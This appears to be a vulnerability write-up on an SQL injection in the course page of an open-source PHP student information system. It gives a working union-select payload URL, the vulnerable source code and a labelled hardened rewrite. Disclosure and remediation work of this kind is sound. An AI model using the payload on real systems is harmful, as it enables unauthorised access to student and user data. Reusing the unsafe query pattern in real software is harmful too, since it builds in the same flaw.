
PHP Code Audit: Simple Student Information System manage_course.php SQL Injection

 2 years ago
source link: https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Simple%20Student%20Information%20System%20manage_course.php%20SQL%20Injection/

Vendor Homepage:

https://www.sourcecodester.com

Source Code Download:

https://www.sourcecodester.com/php/15147/simple-student-information-system-phpoop-free-source-code.html

Payload

Simple Student Information System SQL Injection

http://192.168.1.8/sis/admin/courses/manage_course.php?id=-6659%27%20%20union%20select%201,2,database(),user(),5,6,7,8--%20-

admin/courses/manage_course.php, lines 1-13:

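<?php
require_once('../../config.php');
if(isset($_GET['id'])){
    // Vulnerable: $_GET['id'] is interpolated into the SQL string without validation or escaping
    $qry = $conn->query("SELECT * FROM `course_list` where id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        $res = $qry->fetch_array();
        // Copy each named column of the row into a variable of the same name
        foreach($res as $k => $v){
            if(!is_numeric($k))
                $$k = $v;
        }
    }
}
?>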
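
A hardened form of the same lookup, as an added example (not code from the original post or from the project). It assumes `$conn` is a mysqli connection created by config.php; `load_course` and `$course` are hypothetical names.

```php
<?php
// Added example, not the project's code: hardened version of the lookup above.
// Assumption: config.php defines $conn as a mysqli connection (the original
// calls ->query(), ->num_rows and ->fetch_array() on it).
require_once('../../config.php');

/**
 * Hypothetical helper: return the course_list row for $rawId, or null.
 */
function load_course(mysqli $conn, $rawId): ?array
{
    // Accept only a plain integer; arrays (id[]=1) and strings such as
    // "-6659' union select ..." fail validation and never reach the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }

    // The value is bound as an integer parameter, so it cannot alter the SQL text.
    $stmt = $conn->prepare('SELECT * FROM `course_list` WHERE id = ?');
    if ($stmt === false) {
        error_log('manage_course: prepare failed');
        return null;
    }
    $stmt->bind_param('i', $id);
    $row = null;
    if ($stmt->execute()) {
        $result = $stmt->get_result();   // requires the mysqlnd driver
        if ($result !== false) {
            $row = $result->fetch_assoc() ?: null;
        }
    }
    $stmt->close();
    return $row;
}

$course = isset($_GET['id']) ? load_course($conn, $_GET['id']) : null;
if ($course !== null) {
    // Like the original foreach/$$k loop, this creates one variable per column,
    // but EXTR_SKIP refuses to overwrite variables that already exist ($conn, ...).
    extract($course, EXTR_SKIP);
}
?>
```

The bound parameter is what keeps request data out of the SQL text; the integer check only rejects malformed requests early and should not be relied on by itself.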
